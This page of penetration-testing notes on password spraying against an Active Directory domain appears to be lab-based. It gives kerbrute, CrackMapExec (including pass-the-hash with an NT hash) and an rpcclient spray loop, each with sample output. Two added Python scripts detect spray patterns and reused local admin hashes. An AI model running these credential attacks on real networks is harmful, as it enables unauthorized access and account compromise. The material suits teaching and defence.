Brute Force / Password Spraying - Linux Tools

This page is for password spraying when we have access to a Linux host inside the internal network.


Kerbrute

Kerbrute is a great tool if we don't have a username:password yet, but we want to attempt to brute force our way in. We can brute force usernames or passwords... as well as spray a discovered credential.

$ ./kerbrute -h

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Spray Password

If we discover a credential, we can spray it against known users.

attacker@kali$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop

2022/02/17 22:57:12 >  Using KDC(s):
2022/02/17 22:57:12 >  	172.16.5.5:88

2022/02/17 22:57:12 >  [+] VALID LOGIN:	 [email protected]:Welcome1
2022/02/17 22:57:12 >  Done! Tested 57 logins (1 successes) in 0.172 seconds

Password Brute Force

If we have discovered usernames but no password, we can try to brute force valid credentials.

attacker@kali$ kerbrute bruteuser --dc intelligence.htb -d intelligence.htb /usr/share/wordlists/rockyou.txt William.Lee

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop

2022/02/17 22:57:12 >  Using KDC(s):
2022/02/17 22:57:12 >  	172.16.5.5:88

Username Brute Force

If we have neither usernames nor passwords, we can try to find valid Kerberos usernames using a username wordlist.

attacker@kali$ kerbrute userenum usernames.txt --dc intelligence.htb -d intelligence.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 02/08/24 - Ronnie Flathers @ropnop

2024/02/08 15:31:14 >  Using KDC(s):
2024/02/08 15:31:14 >   intelligence.htb:88

2024/02/08 15:31:14 >  [+] VALID USERNAME:       [email protected]
2024/02/08 15:31:14 >  [+] VALID USERNAME:       [email protected]
2024/02/08 15:31:14 >  [+] VALID USERNAME:       [email protected]
2024/02/08 15:31:14 >  [+] VALID USERNAME:       [email protected]
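The three kerbrute modes above each leave a distinct pattern on the KDC: userenum triggers KDC_ERR_C_PRINCIPAL_UNKNOWN for many names, passwordspray triggers one KDC_ERR_PREAUTH_FAILED per user across many users, and bruteuser triggers many KDC_ERR_PREAUTH_FAILED for a single user. The following added example (my code, not kerbrute's and not from this page) classifies a batch of constructed Kerberos event records, shaped like the fields of Windows Security events 4768 and 4771, into those three patterns and flags any account that logged in successfully after a spray. The key=value record format, source addresses, usernames, timestamps and thresholds are all assumptions made for the example.

```python
"""Classify Kerberos authentication telemetry into the three patterns kerbrute
produces on the KDC side: username enumeration, password spray, brute force.

Added example, not part of kerbrute or the original page. The records are
constructed to resemble Windows Security events 4768 (TGT requested, carrying a
Kerberos result code) and 4771 (pre-authentication failed); all values are made up."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Kerberos result codes (RFC 4120, section 7.5.9)
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # user does not exist: what userenum provokes
KDC_ERR_PREAUTH_FAILED = 0x18       # user exists, wrong password: spray / brute force

# Constructed telemetry: four sources, one pattern each (the last one is benign)
SAMPLE_EVENTS = """\
time=2024-02-08T15:31:14 id=4768 src=10.10.14.5 user=ann.dole status=0x6
time=2024-02-08T15:31:14 id=4768 src=10.10.14.5 user=bob.ray status=0x6
time=2024-02-08T15:31:14 id=4768 src=10.10.14.5 user=cara.lin status=0x6
time=2024-02-08T15:31:15 id=4768 src=10.10.14.5 user=dan.ho status=0x6
time=2024-02-08T15:31:15 id=4768 src=10.10.14.5 user=eve.kim status=0x6
time=2024-02-08T15:31:15 id=4768 src=10.10.14.5 user=fay.ng status=0x6
time=2024-02-08T15:32:01 id=4771 src=10.10.14.6 user=h.park status=0x18
time=2024-02-08T15:32:01 id=4771 src=10.10.14.6 user=i.quinn status=0x18
time=2024-02-08T15:32:01 id=4771 src=10.10.14.6 user=j.rossi status=0x18
time=2024-02-08T15:32:02 id=4771 src=10.10.14.6 user=k.sato status=0x18
time=2024-02-08T15:32:02 id=4771 src=10.10.14.6 user=l.tan status=0x18
time=2024-02-08T15:32:02 id=4771 src=10.10.14.6 user=m.ueda status=0x18
time=2024-02-08T15:32:03 id=4771 src=10.10.14.6 user=n.vogel status=0x18
time=2024-02-08T15:32:03 id=4768 src=10.10.14.6 user=g.moss status=0x0
time=2024-02-08T15:33:10 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:33:10 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:33:11 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:33:11 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:33:12 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:33:12 id=4771 src=10.10.14.7 user=william.lee status=0x18
time=2024-02-08T15:34:00 id=4771 src=10.10.14.8 user=j.doe status=0x18
time=2024-02-08T15:34:05 id=4771 src=10.10.14.8 user=j.doe status=0x18
time=2024-02-08T15:34:09 id=4768 src=10.10.14.8 user=j.doe status=0x0
"""


def parse_events(text):
    """Parse the constructed key=value records into dicts with a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = dict(kv.split("=", 1) for kv in line.split())
        events.append({
            "time": datetime.strptime(f["time"], "%Y-%m-%dT%H:%M:%S"),
            "event_id": int(f["id"]),
            "src": f["src"],
            "user": f["user"].lower(),
            "status": int(f["status"], 16),
        })
    return events


def classify(events, window=timedelta(minutes=5), threshold=5, per_user_max=2):
    """Slide a time window over each source's events and report the first window
    per source that matches each pattern. Thresholds are illustrative assumptions."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    findings, seen = [], set()
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            win = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            unknown = {e["user"] for e in win if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN}
            fails = Counter(e["user"] for e in win if e["status"] == KDC_ERR_PREAUTH_FAILED)
            ok = [e["user"] for e in win if e["event_id"] == 4768 and e["status"] == 0]
            kinds = []
            if len(unknown) >= threshold:
                kinds.append("username_enumeration")   # many names that do not exist
            if len(fails) >= threshold and max(fails.values()) <= per_user_max:
                kinds.append("password_spray")         # many users, few tries each
            if fails and max(fails.values()) >= threshold:
                kinds.append("brute_force")            # one user, many tries
            for kind in kinds:
                if (src, kind) in seen:
                    continue
                seen.add((src, kind))
                findings.append({
                    "src": src,
                    "kind": kind,
                    "start": first["time"],
                    "users": sorted(unknown if kind == "username_enumeration" else fails),
                    "success_after": ok,   # accounts that then got a TGT: treat as compromised
                })
    return findings


if __name__ == "__main__":
    for f in classify(parse_events(SAMPLE_EVENTS)):
        print(f["src"], f["kind"], len(f["users"]), "users, success:", f["success_after"])
```

The "1 successes" line in the kerbrute spray output above is what the success_after field captures on the defender's side: a TGT issued to an account from the same source that just failed against many others. Tuning the window and thresholds to the domain's lockout observation window keeps the spray rule from firing on ordinary mistyped passwords, which is why the benign source (two failures then a success for one user) produces no finding.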

CrackMapExec

Password Spray / Brute Force

We can use crackmapexec to brute force passwords, usernames, and spray when we discover a new credential. It is an invaluable tool to have in our toolbox.

attacker@kali$ sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\avazquez:Password123

CrackMapExec --local-auth

It's important to always test for local Windows authentication as well as domain authentication when discovering a password.

attacker@kali$ sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

SMB         172.16.5.50     445    ACADEMY-EA-MX01  [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.25     445    ACADEMY-EA-MS01  [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.125    445    ACADEMY-EA-WEB0  [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
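The --local-auth output above shows one local administrator NT hash accepted on three different hosts, which is the finding a defender has to remediate (a unique local administrator password per host, for example via LAPS). The following added example, not part of CrackMapExec and not from the original page, parses CME's SMB result lines (the result lines shown above are reused as input) and reports local-account credentials that were valid on more than one host; the column and credential layout it assumes is taken from those lines.

```python
"""Parse CrackMapExec SMB result lines and report local-account credentials
accepted on more than one host.

Added example; this is not CrackMapExec code. SAMPLE_OUTPUT is copied from the
result lines shown on this page."""
import re
from collections import defaultdict

# Column layout of a CME SMB line: protocol, ip, port, hostname, [flag] message
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<flag>[+*\-!])\]\s+(?P<msg>.*)$"
)
# Credential part of a [+] message: REALM\user:password or REALM\user <32-hex NT hash>,
# optionally followed by "(Pwn3d!)" when the account is an administrator on the host
CRED_RE = re.compile(
    r"^(?P<realm>[^\\]+)\\(?P<user>\S+?)(?::(?P<password>\S+)|\s+(?P<nthash>[0-9a-fA-F]{32}))"
    r"(?P<admin>\s+\(Pwn3d!\))?\s*$"
)

# Result lines from this page (raw string so the backslashes survive)
SAMPLE_OUTPUT = r"""
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\avazquez:Password123
SMB         172.16.5.50     445    ACADEMY-EA-MX01  [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.25     445    ACADEMY-EA-MS01  [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB         172.16.5.125    445    ACADEMY-EA-WEB0  [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
"""


def parse_cme(text):
    """Return one record per successful ([+]) authentication line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["flag"] != "+":
            continue   # banner [*] lines and failures carry no credential
        c = CRED_RE.match(m["msg"])
        if not c:
            continue
        records.append({
            "ip": m["ip"],
            "host": m["host"],
            "realm": c["realm"],
            "user": c["user"],
            "secret": c["password"] or c["nthash"],
            "secret_type": "password" if c["password"] else "nthash",
            # --local-auth results print the host name as the realm instead of the domain
            "local": c["realm"].upper() == m["host"].upper(),
            "admin": c["admin"] is not None,
        })
    return records


def shared_local_admins(records, min_hosts=2):
    """Group successful local administrator logins by (user, secret) and return
    the credentials that worked on at least min_hosts distinct hosts."""
    by_cred = defaultdict(set)
    for r in records:
        if r["local"] and r["admin"]:
            by_cred[(r["user"], r["secret"])].add(r["host"])
    return {k: sorted(v) for k, v in by_cred.items() if len(v) >= min_hosts}


if __name__ == "__main__":
    for (user, secret), hosts in shared_local_admins(parse_cme(SAMPLE_OUTPUT)).items():
        print(f"local {user} with secret {secret} is valid on {len(hosts)} hosts: {', '.join(hosts)}")
```

The domain credential on the DC line is parsed but excluded from the report because its realm is the domain rather than the host name; only the reused local account surfaces, with the list of hosts that share it, which is exactly the remediation scope.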

rpcclient

Using a Bash one-liner for the Attack

# Read the user list line by line (no word splitting, no cat) and keep only the Authority line rpcclient prints on a successful bind
while read -r u; do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority
done < valid_users.txt
